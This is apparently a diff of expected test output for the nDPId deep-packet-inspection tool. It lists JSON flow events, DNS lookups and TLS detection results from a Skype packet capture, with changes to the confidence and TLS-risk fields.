+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634591,"flow_last_seen":1431970634591,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970634591,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49864,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634648,"flow_last_seen":1431970634648,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1431970634648,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61016,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1431970634648,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"ts_msec":1431970634648,"pkt":"0NQSxnP1PBXCt3IOCABFAABCEa4AAEAR5YnAqAEiwKgBAe5YADUALntuuqkBAAABAAAAAAAABGFwcHMLc2t5cGVhc3NldHMDY29tAAABAAE="}
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634648,"flow_last_seen":1431970634648,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1431970634648,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61016,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"apps.skypeassets.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634648,"flow_last_seen":1431970634648,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1431970634648,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61016,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"apps.skypeassets.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634669,"flow_last_seen":1431970634669,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1431970634669,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1431970634669,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"ts_msec":1431970634669,"pkt":"0NQSxnP1PBXCt3IOCABFAABXFu0AAEAR4DXAqAEiwKgBAeFeADUAQ\/HxjTUBAAABAAAAAAAADkRCM01TR1I1MDExNzA5B2dhdGV3YXkJbWVzc2VuZ2VyBGxpdmUDY29tAAAcAAE="}
-00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634669,"flow_last_seen":1431970634669,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1431970634669,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634669,"flow_last_seen":1431970634669,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1431970634669,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1431970634723,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"ts_msec":1431970634723,"pkt":"PBXCt3IO0NQSxnP1CABFAACYAABAAEARtuHAqAEBwKgBIgA14V4AhKxSjTWBgAABAAAAAQAADkRCM01TR1I1MDExNzA5B2dhdGV3YXkJbWVzc2VuZ2VyBGxpdmUDY29tAAAcAAHALQAGAAEAAAbhADUDbnMxBG1zZnQDbmV0AAZtc25oc3QJbWljcm9zb2Z0wDJ4Gz7uAAAcIAAAA4QAJOoAAAAOEA=="}
-00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970634669,"flow_last_seen":1431970634723,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1431970634723,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970634669,"flow_last_seen":1431970634723,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1431970634723,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1431970634728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970634728,"pkt":"0NQSxnP1PBXCt3IOCABFAABADqBAAEAGmPnAqAEinTg0HMgdnEkK2QRYAAAAALAC\/\/9q8wAAAgQFtAEDAwUBAQgKPjGHIQAAAAAEAgAA"}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1431970634728,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431970634728,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/L\/oAAEARx0DAqAEiwKgBAfWbADUAK9VUuF8BAAABAAAAAAAABWRzbjEzAWQFc2t5cGUDbmV0AAABAAE="}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn13.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn13.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1431970634729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431970634729,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/lFMAAEARYufAqAEiwKgBAebpADUAK335A20BAAABAAAAAAAABWRzbjEzAWQFc2t5cGUDbmV0AAAcAAE="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn13.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn13.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1431970634729,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970634729,"pkt":"0NQSxnP1PBXCt3IOCABFAABAt4dAAEAGpVrAqAEinTh+08geAbsxSRU0AAAAALAC\/\/+DfQAAAgQFtAEDAwUBAQgKPjGHIQAAAAAEAgAA"}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634730,"flow_last_seen":1431970634730,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970634730,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1431970634730,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431970634730,"pkt":"0NQSxnP1PBXCt3IOCABFAABLIWAAAEAR1c7AqAEiwKgBAeD4ADUANz9NJ5kBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAABAAE="}
-00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634730,"flow_last_seen":1431970634730,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970634730,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst11.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634730,"flow_last_seen":1431970634730,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970634730,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst11.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634731,"flow_last_seen":1431970634731,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970634731,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1431970634731,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431970634731,"pkt":"0NQSxnP1PBXCt3IOCABFAABL+hcAAEAR\/RbAqAEiwKgBAdB8ADUAN25j7f4BAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAAcAAE="}
-00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634731,"flow_last_seen":1431970634731,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970634731,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst11.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634731,"flow_last_seen":1431970634731,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970634731,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst11.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1431970634805,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431970634805,"pkt":"PBXCt3IO0NQSxnP1CABFAAA4BUNAAHYGIaedOH7TwKgBIgG7yB4Nim5XMUkVNZASIABVdAAAAgQFrAQCCAoZLZ4CPjGHIQ=="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1431970634805,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970634805,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0\/VlAAEAGX5TAqAEinTh+08geAbsxSRU1DYpuWIAQ\/\/+P3gAAAQEICj4xh20ZLZ4C"}
-00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970634729,"flow_last_seen":1431970634832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1431970634832,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970634729,"flow_last_seen":1431970634832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1431970634832,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1431970634933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970634933,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtJ2dODQcwKgBIpxJyB3uE3m5CtkEWaASOJCk1gAAAgQFrAQCCApMX+pXPjGHIQEDAwk="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1431970634934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970634934,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0Qp9AAEAGZQbAqAEinTg0HMgdnEkK2QRZ7hN5uoAQECz7NQAAAQEICj4xh+xMX+pX"}
-01299{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431970634729,"flow_last_seen":1431970634990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"ts_msec":1431970634990,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}}
